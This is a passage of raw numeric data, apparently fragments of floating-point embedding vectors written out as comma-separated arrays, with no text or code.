,-0.029694146,-0.0214221,0.0031641673,-0.10824929,-0.0009804075,0.0047807614,0.010952597,0.036582116,-0.0053641284,-0.007948322,-0.011058083,-0.0018362997,0.006159935,0.012924965,-0.010876693,-0.019025054,-0.016151777,0.032893598,-0.0121458825,-0.025678908,-0.0028103846,0.0030028226,-0.020016933,-0.005544129,-0.006270617,-0.025579292,0.0032160603,0.035902835,0.0038296964,-0.0058950926,0.0014661866,0.013148816,-0.010570229,-0.014282548,-0.006535441,0.00050407345,0.0028173132,-0.0021736082,-0.005463132,-0.006502332,0.031108463,-0.016819468,-0.017767526,-0.0049830396,0.02343313,-0.0027168142,-0.00046160564,-0.019685922,0.010935094,-0.037309356,-0.003736406,-0.011203875,-0.0033116527,-0.00860153,0.012473865,0.0044901725,-0.0038887062,0.0031834848,0.0003542493,0.0048425687,0.0003127496,0.02540376,0.0052110087,-0.0008690084,-0.01834661,-0.0056002038,0.002827637,0.0023557947,0.0029244062,0.011130839,-0.0027596005,-0.0057976227,-0.0063426103,0.002344457,-0.024736006,-0.014100053,-0.019554876,-0.0064462437,0.0031537516,0.01207134,-0.009412978,0.0007025662,-0.0002717296,0.04169014,-0.01044257,0.02848115,0.012429241,0.00864343,-0.009860547,-0.014118435,-0.010279096,0.030339453,0.0097157955,-0.010310336,-0.003990612,0.014726537,0.012069779,0.025309041,0.011075175,-0.0131747555,0.0072124545,-0.0064664166,0.008631626,0.002653358,-0.007948076,-0.006213465,-0.019087566,-0.01602585,-0.0045457217,-0.009140913,-0.014260263,-0.010353646,-0.009025828,-0.005407009,0.029840855,0.026421461,0.028940167,0.01352541,0.010272666,-0.002702702,0.026074149,-0.014935211,-0.02076317,-0.008272207,-0.005432567,-0.021366883,0.031474654,0.029975014,-0.002441896,0.013201486,-0.0059164753,-0.0106633715,0.005470203,-0.013253708,0.027446132,0.008681565,0.014603245,-0.007735457,0.011759998,-0.021015337,0.015469472,0.0008402474,0.02112319,-0.012924519,-0.005356186,-0.002592384,0.005459823,-0.013548284,0.011121648,-0.0024349857,0.0020021177,0.0025069583,-0.021939037,-0.0015306136,0.0005161593,-0.018141601,0.0027174717,0.00686039,0.004841638,0.0012344087,-0.0057854396,-0.020300854,-0.00047314801,0.00090098387,0.001303437,0.02155973,-0.008689694,-0.024519505,0.023052234,0.004600086,-0.016939882,0.0021561687,0.01319339,-0.012145916,-0.011499442,0.007690251,-0.005949006,-0.017089127,-0.005346644,0.029658936,0.013566354,-0.006355014,-0.0026265085,-0.012409828,0.000098378456,-0.014350187,-0.011356998,0.007022452,-0.010401367,-0.0069180396,-0.017286161,0.025152214,-0.002084212,-0.015194855,-0.0017447869,-0.009415623,-0.020728372,-0.008954635,-0.0058196527,0.01281217,-0.0063345293,0.009417113,0.01584302,-0.006461637,0.018353494,-0.016018474,0.007814374,0.033392202,0.018743694,-0.009524408,0.021648904,-0.0030614678,0.008190724,-0.013739889,-0.004042885,0.010301943,0.12808949,0.014748525,-0.0025219673,-0.00155468,0.006123642,0.003530901,-0.0000059502136,-0.008887918,0.0034988206,0.008845998,0.015779044,-0.011397337,0.007358744,0.002488604,-0.005537367,0.025626022,0.021449884,-0.034334894,0.029820668,-0.006898442,0.011099261,-0.003977896,-0.01945102,-0.0374062,-0.0094814,-0.03999079,0.038791586,0.016937874,0.007666192,0.027840175,0.00059730065,-0.0005433715,0.0096186,0.004165081,-0.024819288,0.011024449,0.020787872,-0.010993855,0.0011653957,-0.020325156,0.027430566,0.0041431654,0.0040170327,-0.010571767,-0.013209728,-0.018265566,0.0076686,0.0012884504,-0.0030675936,-0.011250413,0.005940791,-0.0061535905,-0.00061845465,-0.013793219,0.009089771,-0.014060405,-0.0053153895,0.011761473,0.0027495867,-0.029013824,0.014700189,0.009672842,-0.002400631,0.005118429,0.020488665,0.013733643,-0.021612614,-0.023722103,-0.001411151,-0.0074831275,0.018678237,-0.010097577,-0.004527761,-0.0062287278,-0.007415307,-0.0043929475,-0.006698207,-0.005898914,0.012075707,-0.0015682773,0.0011889787,0.0004617877,0.006816777,0.0042012064,-0.0036764024,0.007604272,-0.0023377785,0.018081002,-0.0035095983,-0.027568143,-0.022469277,0.008494446,0.025097122,0.00973749,0.00234007,0.012916716,0.002238429,0.0074774832,-0.02620718,-0.011340131,-0.025631173,-0.0046897866,-0.008470308,0.0144519955,0.0019138409,-0.0041392148,-0.006696504,-0.000946131,-0.0059142667,-0.001678491,-0.00738498,0.02103172,-0.0011658906,0.012679924,-0.015416732,0.030687919,-0.025356146,-0.012126014,0.009724712,-0.015609775,-0.0051594893,-0.0011663354,0.007194131,0.022685882,0.0073082587,0.001197927,-0.015814452,-0.0010831724,-0.003854597,0.015193565,0.0022980599,-0.032552738,0.01767916,0.021554127,-0.0017654311,-0.0063548354,0.023738416,0.007831721,0.013397546,0.00028768543,0.0012792865,-0.010730036,-0.0058554886,-0.023651991,0.003022482,-0.014451788,0.012450318,-0.009675422,0.009684343,0.0038936557,0.020090688,0.02790705,-0.017787656,-0.00891252,-0.014190447,-0.009412341,-0.002373549,0.012402968,0.0015295016,-0.015996562,0.014850319,-0.007029708,0.003907697,-0.049291767,0.018669235,0.019052353,0.016911441,-0.00639166,-0.0058639683,-0.0017126391,-0.02434902,-0.002923023,-0.0056677577,0.0043848194,-0.0018153097,0.0079935035,0.013627306,0.010997603,-0.020335864,-0.011132213,0.00644073,0.013980125,-0.005754768,-0.0020206699,0.024732105,0.005371507,0.00019374223,0.0006995033,-0.010608012,0.02752386,0.0022060543,-0.0052507385,0.00274396,0.0086549865,-0.020968407,0.03137313,-0.041130286,0.054104336,-0.02558044,-0.04137463,-0.012967079,-0.00046963236,0.017896868,-0.036347087,0.002846152,0.0018581134,-0.0066075195,-0.007723451,0.009687374,-0.008615208,0.007852466,-0.005111003,0.008975284,-0.020755488,-0.01038117,-0.000980012,0.000565647,-0.029372204,-0.009500351,-0.009126553,-0.0073667085,0.020732375,-0.0039641787,-0.002679783,0.0034141482,-0.0013667097,0.0046779746,0.007740727,0.009713633,-0.023568027,-0.021287087,0.02072564,0.0071472675,-0.017332822,-0.008673074,0.008855112,0.017055273,0.029219104,0.008434559,-0.0051544546,-0.002312398,-0.00017562456,0.008425981,0.008463082,-0.023432454,-0.00006542216,-0.005414028,-0.02020612,0.017555043,-0.011557554,-0.047578808,-0.01549921,-0.027571216,-0.010439801,-0.0140160695,-0.016502658,0.009336512,0.026886607,0.020356977,-0.016029216,0.004996943,0.019387053,-0.008509108,0.01893675,-0.0034556354,-0.016492307,0.007445788,-0.01117142,-0.01680517,0.005983993,-0.0011059064,0.016484082,-0.017170683,0.032768745,0.018873267,0.003194865,0.00021902604,0.0040275813,0.016010523,-0.0073845442,0.0027411527,-0.0110584935,-0.009201901,-0.020845294,-0.012914701,-0.00033207107,0.0047313184,0.021416834,0.072035596,-0.061083224,0.003662004,0.0073509193,0.022857927,-0.017021768,0.03380255,-0.0028179595,-0.024465285,-0.01942587,0.004712459,-0.0031581002,-0.018252736,-0.040304933,0.003968255,0.007843887,-0.0024302397,-0.016164107,0.020059485,-0.010027843,-0.014723792,0.014416298,-0.002424583,0.0005914726,-0.013225118,-0.0006765949,-0.0013807743,-0.0068647466,0.0170565,0.009929836,0.018256532,0.014770933,0.020233147,-0.005446816,-0.0015835962,0.017629415,-0.008193621,0.010153182,0.011317342,-0.028943958,-0.022075668,-0.014403544,-0.0034039838,0.0075146924,0.0031462589,-0.0032699502,-0.011208379,0.016109645,-0.004323718,0.12824443,-0.019995896,-0.0012152658,0.012783509,0.0015269747,0.0036631098,0.004528614,0.017906856,0.0035433453,0.009535968,-0.005971036,0.0138220405,0.0046471073,0.02973187,-0.0064689447,-0.0026855846,0.002657976,0.14670202,-0.019220011,0.029359775,0.002056105,-0.0034908308,0.0016814212,0.011380479,0.015227342,-0.077379465,-0.007724483,-0.030011686,-0.0043230616,0.007854341,-0.033528768,0.022904562,-0.020697966,-0.0074467664,-0.011194618,0.0066443277,-0.010647347,-0.00061742164,-0.026311748,-0.0048767263,-0.0011570372,0.007830141,-0.0062748925,0.00758559,-0.015140185,0.0050740326,-0.033454027,0.00067596644,0.0000068682284,0.01081192,0.008009303,-0.0082636,0.025378542,-0.008452983,0.010767131,-0.012488144,0.002219018,-0.0051916097,-0.00650661,0.019222304,-0.0123006115,0.01448513,-0.0062799705,0.024602126,-0.013902408,-0.008129293,-0.018125944,-0.0056512756,0.0055148485,-0.0061426866,0.021838311,0.025404219,-0.02129689,0.00289367,0.03312601,-0.021514367,-0.010961366,-0.0016795729,0.020529555,-0.0014065087,0.024594938,0.0019956534,0.0010600068,0.011471838,0.007534934,0.022832837,0.0051875864,0.024004217,0.0111871455,-0.02504817,-0.007351858,0.009562473,-0.009985921,-0.003048678,0.017000591,0.012221402,0.004533531,0.0033906142,0.0057388614,-0.011349541,-0.0057070204,0.03281955,0.014852878,-0.005634482,-0.0041635875,0.0037570584,-0.008411812,-0.030491779,-0.010550118,-0.007308419,-0.0030255008,-0.0016251095,-0.007492404,0.025893549,-0.005903086,-0.0135790715,-0.010652555,-0.0054975436,-0.022727374,0.018083699,0.009923089,-0.008885938,-0.0039575556,0.00013089732,-0.0030825445,0.0043450664,0.017426694,0.028307263,-0.008794569,-0.0205307,-0.021762803,-0.020843696,-0.004404018,0.05991212,0.0032482855,-0.008757179,0.0227894,-0.029031424,-0.022081532,-0.00259957,-0.0018957304,0.0033667476,0.0068635195,0.004843025,-0.017010206,-0.009266131,0.0037411046,0.0005225553],[-0.014671751,0.0021217891,-0.010378193,-0.022519078,0.0045895944,-0.012700467,-0.005379966,0.016760906,0.0063467384,-0.016401462,-0.008707854,0.03096595,0.007145288,-0.008919794,-0.036177896,0.0004075489,0.0066327895,-0.0049718856,-0.01612595,-0.0017911423,0.013799446,0.00097464904,0.016160743,-0.009481847,-0.009972507,0.00610577,0.0038547239,0.008941797,0.007096323,0.009880238,-0.011806833,0.026031654,0.0007356531,0.000103079175,0.018200334,-0.004049294,-0.017886693,-0.009760718,-0.00021905488,-0.023927284,-0.008033182,0.0050650877,-0.0061259046,0.033068266,-0.010721415,-0.00865904,0.0036194404,0.016731886,-0.0157537,-0.002654486,0.017184598,-0.01949897,-0.026155073,0.031204829,-0.015405613,0.027886622,-0.0023880536,-0.0106657585,0.015387411,-0.015556572,-0.009073561,0.008278919,-0.0043881116,-0.0070470893,0.0029471845,0.0010707622,-0.011353132,-0.013050635,0.0013849606,-0.023563832,0.0058028917,-0.0038406944,0.011077803,-0.0035314593,0.0023823974,0.018406147,-0.012452488,-0.013850345,-0.009442286,0.010519257,-0.0024610995,-0.003046244,-0.006468621,-0.0030190125,0.021687618,-0.001786606,-0.0050104046,-0.000480549,0.0037354184,-0.031115998,-0.0155166,0.01192393,0.008984435,-0.009597688,-0.004020685,0.00037448984,0.01207491,-0.002462241,0.00031158523,0.016277863,-0.004867939,-0.002890426,-0.021655016,0.013003457,0.0062517426,-0.014172159,-0.016997669,-0.0037993977,0.004604102,-0.021044336,0.0015415283,-0.0121463165,-0.011051226,0.016884476,0.0054921336,-0.007520325,0.0029208865,0.025651071,-0.005186712,0.015851738,-0.011531601,0.029118355,0.006493423,-0.0038974315,-0.017298212,-0.016030442,-0.005026621,0.0017140006,-0.008784336,-0.0015339078,0.0066190315,0.01930698,0.0005743072,-0.02157017,-0.0109649785,0.0083808545,0.011275994,-0.015408027,-0.007949427,-0.013333132,0.020980196,-0.00029259548,0.0065483553,0.010401312,0.032507706,0.010991857,0.00073801563,0.025919113,0.02085673,-0.0026260016,0.0075600133,-0.0030711521,-0.021373373,-0.019381812,-0.013495686,0.0052200034,0.0093997335,-0.009502273,-0.029700402,-0.004969389,-0.018820815,0.007258019,0.018748518,-0.010042153,-0.03855033,-0.02862917,0.008597355,0.017428983,-0.012023583,-0.0010767346,0.019897595,0.03635553,0.017164044,0.007398441,0.0067653386,0.012231491,-0.007566673,-0.023672583,-0.0040247743,0.0036127544,-0.007912357,0.00089678186,0.0030023593,-0.0005032243,-0.008902272,0.01753795,0.035729796,0.005946271,-0.024937328,-0.006395084,-0.0049659116,-0.017543914,0.0010298106,-0.0076841335,-0.01750016,-0.008704036,-0.002306802,0.10644252,0.0059872847,-0.0036156625,-0.01632171,0.00471006,0.0063360664,-0.0255721,0.00407414,-0.015844822,0.0009261892,-0.022727078,0.010219745,-0.004224757,0.006090991,0.0009647348,-0.018094838,0.004170528,-0.008900302,-0.08382208,0.008700135,0.039536934,-0.019304713,-0.009896379,-0.00046436733,0.006020665,0.0058536646,-0.008739941,-0.018125169,0.009369539,0.01048961,0.002262693,0.014959539,-0.025838533,0.022062447,0.007173455,-0.038139965,-0.0013879482,-0.0010463983,-0.014054036,0.012356143,-0.021439172,0.0016422273,-0.003506798,-0.01167847,0.0046294676,0.019428901,0.029010162,-0.023748435,0.012338074,0.039713237,-0.0064513297,-0.00894501,0.03125334,0.005821237,-0.015745215,0.00083206396,0.025704285,-0.0002318432,-0.024821373,-0.0019919674,-0.011871059,0.005141198,0.0031173474,0.017498368,0.017649679,-0.01746734,0.033064734,0.030569697,0.003588159,0.01756292,-0.03103834,-0.0042159054,-0.024404611,-0.028457155,0.0013714831,-0.013236241,-0.014331011,-0.0004531966,-0.001536826,0.020956023,0.009274196,0.002147634,-0.0066755693,-0.002917645,0.013107967,-0.01342233,-0.029576577,-0.011012189,0.008285446,0.0015339497,0.021504492,0.045395985,-0.011898372,-0.015007329,-0.0072238655,0.038238097,-0.0006215318,-0.004510098,-0.0058414275,-0.04234978,0.033139687,0.0086010145,-0.042765435,-0.0043147947,-0.0057810987,0.016078629,-0.0044609043,-0.008715075,-0.011703955,-0.01249451,0.03072139,-0.016184567,0.020713426,-0.035393827,-0.007495624,-0.009825624,0.004136595,-0.00031385952,0.0030620128,-0.0023517888,-0.027015569,0.0047724424,0.001979385,0.020729415,-0.019865857,0.016411025,-0.025998432,-0.0015899449,0.0013970666,-0.0158525,0.00652973,-0.012180349,0.013132527,-0.012742711,-0.0022380278,0.02460721,0.019827446,-0.0129714655,0.0138493,-0.01126092,0.027350226,0.008366905,0.0068210447,-0.011241728,-0.013394658,-0.017179014,0.020670032,0.0054120524,-0.009239005,-0.010310243,-0.0012999945,0.007334811,0.016984282,0.014369809,-0.014513504,-0.013959948,0.0030267383,-0.011615981,0.0021654656,-0.009155935,-0.020068908,0.0069521833,-0.020515678,0.02100847,0.0056374194,-0.018292192,0.0075431415,0.06371241,-0.028163426,-0.006402644,0.0021112137,-0.023376524,-0.008760587,0.051650457,0.029269194,0.003519497,-0.012519501,-0.011989976,-0.029620074,-0.005118981,-0.007382288,-0.026019106,0.011019143,-0.024330642,-0.0028199959,-0.021270908,-0.014545079,0.03292977,0.002087772,0.016282605,0.011901325,0.01809846,0.035214294,0.0034651612,-0.011581161,0.00870197,-0.018249443,-0.014853373,0.013689765,0.010295649,0.0120142745,-0.02628095,0.012897911,0.0050018393,0.015642643,-0.007816358,-0.008477262,-0.00018754069,0.007815329,0.0024532794,-0.007841712,-0.014529291,0.0358153,0.030814907,-0.012182324,-0.035016783,0.011356761,-0.00094453734,0.008402918,-0.028515033,0.031941626,-0.0009458468,0.0211155,0.014297794,-0.045508366,0.060548827,0.03045689,0.019307792,0.032282744,-0.004008223,-0.0036842918,-0.0011319463,0.03642858,-0.019474145,0.007344955,-0.012560574,0.002634382,0.0023905197,0.008234771,-0.016354928,0.02407408,-0.015943177,0.003993756,0.010122675,-0.0072030486,0.006229109,0.03390406,-0.01875801,0.0052720215,0.0050279107,-0.004011135,-0.0008770255,-0.022523059,0.0029860942,0.014989727,0.0101647405,-0.011784115,-0.00529369,0.008007189,0.0123360865,-0.0050043394,0.014436326,0.010415081,0.0071702315,0.028009329,-0.011234695,0.014959168,0.0027718667,0.0014913916,-0.004145459,-0.0016226786,-0.0031319323,-0.012483492,0.003613212,-0.0074013798,0.00068929105,0.057796765,-0.00012887796,0.0072748596,-0.0009071329,-0.014199115,-0.012071408,-0.022800678,-0.0016427622,-0.0057611596,-0.014352515,0.010034704,0.01047944,0.010440281,0.0018666517,0.04365297,-0.015873792,0.005016121,-0.0058763083,-0.029383348,0.011731107,0.023934787,0.01751675,0.022659322,0.018735178,-0.028949171,0.018337946,0.0034098895,-0.012789117,-0.031578325,0.021949714,0.0124474615,0.016668834,0.027566072,0.025326641,-0.0026229199,0.011430598,0.029379683,0.025075808,0.004477856,-0.017339543,-0.0074129966,-0.0032781146,-0.008817751,0.016431926,-0.02513302,-0.025575925,0.010451433,0.019848885,0.0073422818,-0.011862444,0.0026582521,0.029410053,-0.024140086,-0.0021365997,-0.020475667,-0.0280129,0.01577178,-0.0026503182,0.04581766,-0.023783648,-0.025972158,-0.011549012,0.025117602,0.0071091694,0.0063274344,0.013825287,-0.018060869,0.016708964,0.0010510666,0.031553004,0.012589943,0.032670826,-0.017176325,-0.016964773,0.012323021,-0.004315138,-0.0114082545,-0.011049421,0.00012875996,0.0062341313,-0.0063590123,-0.034185454,-0.02756236,0.0079858545,0.022820741,0.0040672543,-0.016508617,-0.010884411,-0.012974428,0.00042597973,0.02574871,-0.010260546,0.011517968,0.00913231,0.025907347,0.006991342,-0.0141751,0.045778207,0.01308604,0.0014538615,-0.0023699137,0.022198679,0.02365071,-0.009711905,-0.0007640852,0.010026947,0.023049101,-0.0031482307,-0.03782677,0.0070405,0.016654974,0.01949491,-0.023175009,0.0044778977,0.0026693398,0.0050576483,-0.006372718,-0.0011066069,0.0051693916,-0.009987628,-0.0013377956,0.0031890555,-0.020351376,-0.025123317,-0.008426703,-0.006549637,-0.0027286287,-0.015735243,-0.003674755,0.0075900815,-0.007206117,-0.020467835,0.020441627,0.020373132,0.0073692133,0.024177417,0.020237764,-0.03423061,-0.005697275,0.016910968,-0.004403789,-0.013098407,0.009991211,0.013235108,-0.010372787,-0.01076477,0.013674437,-0.029105283,0.02638238,-0.017302077,0.013932371,0.0017556176,0.021859849,0.0015176015,0.00007563574,-0.017464127,-0.0019560305,0.01406541,-0.025588872,0.0010698523,-0.006643168,0.030469447,-0.018137218,-0.0011152835,0.013155647,0.0023006154,0.0042693475,-0.016267404,0.005047927,-0.04999752,0.010297901,0.025980668,0.015944313,-0.017531293,0.018544605,-0.006246099,-0.008606115,-0.007467289,-0.0112511115,-0.020449687,0.01276905,-0.015085391,0.0032665809,0.01805948,-0.013985297,-0.03662526,-0.002378549,-0.03390734,-0.05366703,-0.010683207,0.04170308,0.008265849,0.0040271953,-0.005689788,0.023848256,-0.008347554,-0.016841996,0.014866086,-0.03661979,0.00208872,0.008527697,-0.017279586,0.01275676,-0.0016231015,0.010355392,-0.002952643,-0.01780597,-0.016606083,0.006241166,0.0000633501,-0.023597311,-0.013094633,0.018914586,-0.01838735,0.01013012,-0.007864729,0.025349425,0.0063401344,0.034325186,0.021770116,0.0023566275,-0.0013096903,0.021518383,0.005300932,0.02504085,0.021624353,0.043689746,0.007613271,-0.0014876982,-0.0068920283,-0.011058798,-0.007783977,-0.0025790632,0.017774582,0.038356014,0.016990595,-0.003968261,0.024761476,-0.015959073,0.028134711,-0.010643229,0.007317775,-0.008781492,0.03060068,0.016724821,-0.0034005453,0.01451025,-0.006278006,-0.011785542,-0.0030900745,-0.0370468,-0.013573804,0.030484447,0.005699628,-0.02194632,0.0034688117,0.0023771431,-0.005124782,0.0017372867,-0.0068408013,-0.014847423,-0.014258427,-0.0062444597,0.015960453,-0.015563655,0.017217914,-0.042128094,0.013528723,0.017765243,0.0040256004,0.0016001656,-0.0058259647,-0.006959677,0.0062828106,-0.013223076,-0.041646637,-0.013719742,-0.0009617309,0.030831236,-0.028250877,0.018440671,0.008340969,-0.0100013325,0.0040071816,0.02118666,-0.01513406,-0.020252472,0.010719908,-0.02311862,0.022134306,0.0015450901,0.0271771,0.014427793,0.00046295294,0.0063065356,-0.008197994,-0.0013254884,0.00847295,0.012358858,0.02277461,0.0058524595,-0.015039638,0.00045826824,-0.019679328,-0.0045981505,0.015262641,-0.026013814,-0.0065332493,-0.010145331,0.013009615,-0.0046595903,0.01871325,0.011624163,0.033810373,0.03217554,-0.011214646,0.0034303418,-0.018910948,-0.0025883722,0.035588544,0.033675916,-0.03053801,-0.03259819,-0.024474382,0.023679629,-0.034109063,0.019923154,0.0002162017,-0.009469479,-0.021075673,-0.016546682,0.009550525,-0.023813466,0.014496823,0.020215206,-0.023475893,0.029291233,-0.012425102,0.00807767,0.018094288,0.0073143314,-0.007723649,-0.016561277,0.027337542,-0.021888377,-0.03871565,0.010556394,-0.0045647877,0.028211856,0.025785489,-0.018045017,-0.017098079,-0.025353653,-0.004764082,-0.011914379,0.017713226,0.0057917316,-0.008319994,-0.019469526,0.014774704,-0.0026500772,0.017679282,-0.020879928,0.0005136155,0.0039579626,0.005104928,0.026898056,0.021849474,-0.037641805,0.0114489645,-0.0056689894,-0.013140988,0.02452176,0.0017888633,-0.00760153,0.0019422675,0.0089478,-0.00072159566,-0.023106387,0.015293779,-0.0017158142,0.008971219,0.035311628,0.0031521304,-0.009222652,-0.014349554,-0.022452129,-0.0138128605,-0.0131391045,0.023992838,-0.017322225,0.008647007,0.0044626556,0.01535479,0.0033058065,-0.0036980442,0.016983287,-0.0026628245,0.0028245247,0.013735239,0.009739165,-0.023616115,-0.031010037,0.00096403295,-0.013119222,-0.0026572116,0.0073308917,-0.0095892,0.027271533,0.027769746,-0.023902826,-0.00018511806,0.026789512,-0.0014727878,-0.016066356,0.013172036,0.005987674,-0.011333689,-0.009226432,0.0178156,-0.03321018,-0.010305307,0.009582565,-0.007986969,0.008852682,-0.039540842,0.011035308,-0.0034916506,-0.0021483016,0.024315216,0.004284627,0.009982496,0.00010910007,0.02134455,-0.006342925,-0.003490269,0.03170104,-0.0047056167,0.0026130457,0.0000957425,-0.011648347,-0.010093849,0.02158628,-0.017096581,-0.009858299,0.021997659,0.0014813283,0.0065995827,0.0098557025,-0.019620448,0.015484068,0.020595672,-0.013995915,0.0035763425,-0.025861258,-0.019524949,0.0024018423,-0.015411168,-0.03782128,-0.0032529102,0.018088566,0.010369414,-0.013891775,-0.009585295,-0.0014515066,-0.061098404,0.024212686,-0.024242539,-0.0037885027,0.0108980555,0.0057399063,0.0004590903,0.030886365,0.038659934,-0.0085542,0.022819588,0.00059939426,0.0053502796,0.014039134,0.006190777,-0.010968732,-0.0117616495,0.016602673,0.015029184,0.015721692,-0.005015051,-0.008955209,0.011943025,0.008882377,0.014244279,-0.013859559,-0.0029998869,0.003635611,-0.025206845,0.01000871,0.008810338,0.009712081,-0.001681706,-0.0053644134,-0.0036851324,-0.009208433,0.0107189445,0.007310764,-0.0033298556,0.014412,-0.012489151,0.008844651,0.013343268,0.025997689,0.0053028534,-0.022371272,0.0015286623,-0.020840297,0.006284198,-0.011284631,0.029903753,-0.00956363,0.019999998,-0.0013987666,-0.01567021,0.018596511,0.01800987,0.0118067665,0.015681025,0.0012281132,-0.0027970748,-0.0019833536,0.004564374,0.015493514,-0.031237217,-0.008866001,-0.011839575,0.038070932,-0.019276783,0.014640747,-0.011496515,-0.0029663693,-0.018164894,0.014898852,-0.016618352,0.010694067,0.008675691,-0.021606557,-0.0047601117,-0.021321362,0.0050955755,0.012820329,-0.03295527,-0.0019992578,-0.022373116,-0.017977891,0.010413057,0.00729115,-0.0020694814,-0.006652552,0.001673118,-0.008138134,0.0026508807,0.02293808,0.006316082,0.011224302,-0.012828897,0.005265302,-0.008291699,0.006936479,0.03902409,0.00019950615,-0.0023195413,0.040099654,-0.008287367,0.0006977162,0.0036489228,0.012433456,0.026731526,0.019183254,-0.0003007444,0.02317662,-0.009533258,0.027869128,0.025371863,0.014475749,-0.016788293,0.013610229,0.029226419,0.02597038,-0.0041670967,0.0065801553,0.037132315,-0.0031610685,0.002448701,0.008989628,0.014150515,0.0021370724,-0.015439777,-0.005103156,0.0034845269,0.024406781,-0.0013806882,-0.018891435,0.012336337,0.007411589,-0.0040000943,-0.02320733,-0.01322691,0.0044920193,-0.014343686,-0.015496884,-0.016663363,0.005753687,0.0075358357,-0.022245198,-0.011340559,0.00718665,-0.0024224657,-0.0012444266,-0.0071078925,0.023701351,0.003739614,-0.00035992305,0.0004801146,0.0007724047,-0.00946154,-0.032376587,0.0068607456,0.026566656,-0.0017604544,-0.0152242,-0.014091795,0.017106583,-0.004930929,0.0077878316,-0.024276495,-0.0059643877,-0.004613299,-0.008188173,-0.0017768632,-0.0025314132,-0.007932099,0.032718632,0.011781632,-0.006352199,0.013327364,0.0010980167,0.000033631502,-0.008304645,-0.018280316,0.037521213,0.008396727,-0.011243953,0.014581535,-0.018761912,-0.015627842,-0.01138126,-0.01892731,-0.012676941,-0.008685093,-0.0002187287,0.018998547,-0.020393943,-0.014373801,0.035900027,-0.026178846,0.032559372,0.0044729398,-0.019153673,-0.02310402,0.01910757,0.005008066,0.0122708045,-0.03434928,0.029271731,0.010064514,-0.04576264,-0.0016769168,-0.015621708,0.0014115365,0.0075115142,0.015570393,-0.008635902,-0.022317627,-0.017543394,-0.0073181093,-0.004633072,0.026159536,-0.010659473,0.012007249,0.03043544,0.009870689,-0.010511373,-0.0031496661,-0.012461469,0.023330646,0.023679188,-0.0009249975,-0.012446598,0.018058823,-0.005074871,0.032707185,0.007093373,-0.021994902,-0.003836998,-0.014558618,-0.004185523,-0.002007234,-0.014908308,0.010974761,0.0005518706,0.010757258,-0.012127183,-0.015472978,0.039114147,-0.016082987,0.010935208,0.019978406,0.028244851,-0.01811712,0.012055314,0.015254642,0.0070666126,-0.020872034,-0.008421911,-0.0008391289,-0.018411132,-0.0063594943,0.0032623757,-0.00070443517,-0.007953769,-0.024451217,0.02125958,-0.00093402574,0.00105078,-0.0029667816,0.000053853146,0.022439552,0.007965211,-0.008996638,-0.002656954,-0.0018138418,0.010977514,0.006652776,0.0039199125,-0.016722979,-0.0015909368,0.008889593,0.017914934,-0.00898839,0.008609019,-0.0040695183,-0.017221708,0.0024097927,0.016701175,0.010751802,-0.034059066,0.019549023,0.0024486296,-0.011110931,-0.008791276,0.008403021,0.02367392,0.005483799,-0.005005228,-0.028823765,-0.00058231206,0.002121896,-0.023721714,0.030032167,-0.012641316,0.006386707,-0.007820261,0.004619858,-0.014450339,0.025749702,0.0011905538,0.0058377148,-0.0039191497,-0.02317609,-0.016196463,-0.01705413,-0.0072604874,0.015983356,-0.00064690196,0.0029725574,0.01862776,0.015465855,0.031211935,0.0063654096,0.0014314187,0.000065620356,0.010683369,-0.0016312243,0.028649136,0.021536466,-0.0029817345,0.008269163,0.00732381,0.00824724,-0.019156585,0.008585203,0.026066506,-0.0047956686,-0.000961817,0.013991904,-0.005545719,-0.028170042,0.015099229,-0.0022538833,-0.0115183825,0.055973914,0.003000634,0.024505854,-0.021061637,0.0047602225,-0.0037012014,0.014620206,-0.019100059,0.019810904,0.004832359,-0.0073430394,-0.0034134416,-0.013928405,0.009942285,-0.009388112,0.013650596,0.015301826,-0.008565578,0.006847193,-0.0063859713,0.0021280847,-0.009166068,-0.016687578,0.006408193,-0.0063119996,-0.03590956,0.029126072,-0.024467088,0.029621763,-0.0077097467,0.0020129208,0.012692384,0.002813198,0.0108810505,0.01675432,-0.00024613133,0.001367718,-0.014062783,0.0003631125,-0.0043480154,0.027203208,0.01987936,-0.01757863,-0.010674447,-0.0010894163,-0.011659158,0.07291102,0.039245687,0.010179637,0.02116764,0.0012491188,0.036178194,0.0019391094,0.020255834,0.009946456,-0.0009488334,-0.0013524477,0.011569334,-0.012001693,0.021705937,0.026275503,-0.0146968,0.00888449,0.0077055935,0.0042992895,-0.02242857,-0.007972583,0.020801622,0.0022566144,0.009881999,0.008844247,0.01841639,0.019516887,0.0029563284,0.029159822,0.002125166,0.002533358,0.014430335,0.009804954,-0.010617454,-0.0025166192,-0.055959057,0.007418964,0.1196712,0.006275075,0.0050466326,0.017694034,-0.0053228857,0.0038234885,-0.11467129,0.010927239,-0.030028302,-0.016141722,0.0060658543,-0.027444914,-0.020465754,0.022179065,0.0037037348,-0.0016945235,-0.018402921,-0.036066905,0.014520857,-0.013244372,-0.009072568,-0.018804844,-0.017154094,-0.0054832837,-0.02993677,-0.0038320858,-0.004920655,-0.009108089,-0.012521966,-0.009423007,-0.0040413225,-0.014062051,0.013014264,-0.00462481,-0.020926798,0.011429574,0.0049093547,-0.0052373735,-0.018210892,-0.01212209,0.031299245,0.02200036,-0.018155096,-0.020940552,-0.15219611,-0.017210836,-0.00782544,-0.026042115,0.03361276,-0.022348423,0.003702769,-0.0047494033,0.029877307,-0.009671024,-0.0016981551,0.030117115,-0.007890618,0.0096323,-0.024254637,-0.013844017,-0.0054507744,0.014706259,0.0034380935,0.010696858,0.016725868,-0.001746263,-0.0070182844,-0.031907447,-0.020729212,0.016918905,-0.0011970837,0.01678162,0.017638074,0.00020816342,-0.0036458452,-0.00023919632,-0.015508014,-0.0040401765,-0.014780206,-0.013597252,-0.009573895,0.008343111,-0.023191348,0.004583547,0.0014181293,-0.008815476,0.002366779,-0.010256238,0.012133318,0.018157354,-0.0038418698,0.030029904,0.014849702,0.010646155,0.03488276,-0.0014907868,-0.033033043,0.013260058,-0.00043604372,-0.0052566184,-0.015450481,-0.033375155,-0.008657423,0.014574943,0.0002845745,-0.014709552,-0.0055814423,-0.009514067,0.035146374,0.00035535553,0.027602253,-0.014810736,-0.0020763238,-0.0036236455,-0.006200128,0.00851431,-0.013035644,-0.025785007,0.020272594,0.011054387,-0.011306293,-0.017354948,0.036668986,-0.0135905,-0.013655195,-0.01599036,0.015693976,-0.042332362,0.010089614,-0.021257063,-0.020276522,0.0020159401,-0.014397741,-0.009703798,0.009888896,-0.014770702,-0.002146527,-0.008023953,0.02277671,0.013958213,0.014558209,-0.012066743,-0.041161526,0.0025427341,0.020956462,-0.01820872,-0